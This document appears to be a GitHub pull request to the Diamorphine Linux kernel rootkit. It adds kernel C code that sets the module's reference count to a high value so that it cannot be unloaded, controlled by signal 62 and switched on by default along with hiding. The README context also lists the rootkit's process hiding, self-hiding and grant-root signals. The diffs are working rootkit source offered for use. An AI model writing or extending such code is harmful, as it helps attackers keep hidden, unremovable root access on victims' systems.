### PR TITLE
Module protection

### DIFF
--- a/README.md
+++ b/README.md
@@ -10,6 +10,8 @@ Features
 
 - Hide/unhide any process by sending a signal 31;
 
+- Sending a signal 62(to any pid) protect moudule from delete_module system call;
+
 - Sending a signal 63(to any pid) makes the module become (in)visible;
 
 - Sending a signal 64(to any pid) makes the given user become root;
@@ -49,8 +51,9 @@ insmod diamorphine.ko
 Uninstall
 --
 
-The module starts invisible, to remove you need to make it visible
+The module starts invisible and protected, to remove you need to make it visible and unprotected
 ```
+kill -62 0
 kill -63 0
 ```
 
@@ -87,3 +90,6 @@ https://github.com/zizzu0/LinuxKernelModules/
 
 Linux Rootkits: New Methods for Kernel 5.7+
 https://xcellerator.github.io/posts/linux_rootkits_11/
+
+LKM Refcount Change
+https://cu63.github.io/linux/rootkits/LKM-refcount-change/

--- a/README.md
+++ b/README.md
@@ -10,7 +10,7 @@ Features
 
 - Hide/unhide any process by sending a signal 31;
 
-- Sending a signal 62(to any pid) protect moudule from delete_module system call;
+- Sending a signal 62(to any pid) protect module from delete_module system call;
 
 - Sending a signal 63(to any pid) makes the module become (in)visible;
 

--- a/diamorphine.c
+++ b/diamorphine.c
@@ -321,14 +321,8 @@ void
 module_protect(void)
 {
 	atomic_t *p_ref_count = &THIS_MODULE->refcnt;
-	int old_val;
 
-	do {
-		old_val = atomic_read(p_ref_count);
-		if (atomic_cmpxchg(p_ref_count, old_val, 0x8163) == old_val) {
-			break;
-		}
-	} while (1);
+	atomic_set(p_ref_count, 0x8163);
 	module_protected = 1;
 }
 
@@ -336,15 +330,8 @@ void
 module_unprotect(void)
 {
 	atomic_t *p_ref_count = &THIS_MODULE->refcnt;
-	int old_val;
 
-	do {
-		old_val = atomic_read(p_ref_count);
-		if (atomic_cmpxchg(p_ref_count, old_val, 1) == old_val) {
-			break;
-		}
-	} while (1);
-
+	atomic_set(p_ref_count, 1);
 	module_protected = 0;
 }
 

--- a/diamorphine.c
+++ b/diamorphine.c
@@ -300,6 +300,8 @@ tidy(void)
 
 static struct list_head *module_previous;
 static short module_hidden = 0;
+static short module_protected = 0;
+
 void
 module_show(void)
 {
@@ -313,6 +315,37 @@ module_hide(void)
 	module_previous = THIS_MODULE->list.prev;
 	list_del(&THIS_MODULE->list);
 	module_hidden = 1;
+}
+
+void
+module_protect(void)
+{
+	atomic_t *p_ref_count = &THIS_MODULE->refcnt;
+	int old_val;
+
+	do {
+		old_val = atomic_read(p_ref_count);
+		if (atomic_cmpxchg(p_ref_count, old_val, 0x8163) == old_val) {
+			break;
+		}
+	} while (1);
+	module_protected = 1;
+}
+
+void
+module_unprotect(void)
+{
+	atomic_t *p_ref_count = &THIS_MODULE->refcnt;
+	int old_val;
+
+	do {
+		old_val = atomic_read(p_ref_count);
+		if (atomic_cmpxchg(p_ref_count, old_val, 1) == old_val) {
+			break;
+		}
+	} while (1);
+
+	module_protected = 0;
 }
 
 #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
@@ -344,6 +377,10 @@ hacked_kill(pid_t pid, int sig)
 		case SIGMODINVIS:
 			if (module_hidden) module_show();
 			else module_hide();
+			break;
+		case SIGPROTECT:
+			if (module_protected) module_unprotect();
+			else module_protect();
 			break;
 		default:
 #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
@@ -414,6 +451,7 @@ diamorphine_init(void)
 #endif
 
 	module_hide();
+	module_protect();
 	tidy();
 
 #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)

--- a/diamorphine.h
+++ b/diamorphine.h
@@ -16,6 +16,12 @@ void
 module_show(void);
 
 void
+module_protect(void);
+
+void
+module_unprotect(void);
+
+void
 module_hide(void);
 
 #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
@@ -41,6 +47,7 @@ struct linux_dirent {
 enum {
 	SIGINVIS = 31,
 	SIGSUPER = 64,
+  SIGPROTECT = 62,
 	SIGMODINVIS = 63,
 };
 

--- a/diamorphine.h
+++ b/diamorphine.h
@@ -47,8 +47,8 @@ struct linux_dirent {
 enum {
 	SIGINVIS = 31,
 	SIGSUPER = 64,
-  SIGPROTECT = 62,
 	SIGMODINVIS = 63,
+	SIGPROTECT = 62,
 };
 
 #ifndef IS_ENABLED


### PR DESCRIPTION
@m0nad 

Add module protection against delete_module syscall

Introduces a protection mechanism that prevents the module from being
unloaded via `delete_module` by manipulating `THIS_MODULE->refcnt`.
While refcnt is non-zero, the kernel refuses to unload the module.

- `module_protect()` — sets refcnt to a high value via `atomic_set()`
- `module_unprotect()` — restores refcnt to 1
- Signal 62 (SIGPROTECT) toggles protection state
- Module starts protected by default on load (alongside being hidden)

<img width="439" height="129" alt="Screenshot 2026-04-24 at 21 26 57" src="https://github.com/user-attachments/assets/294b4df0-4d53-4f56-a77c-9b3b77cb5127" />
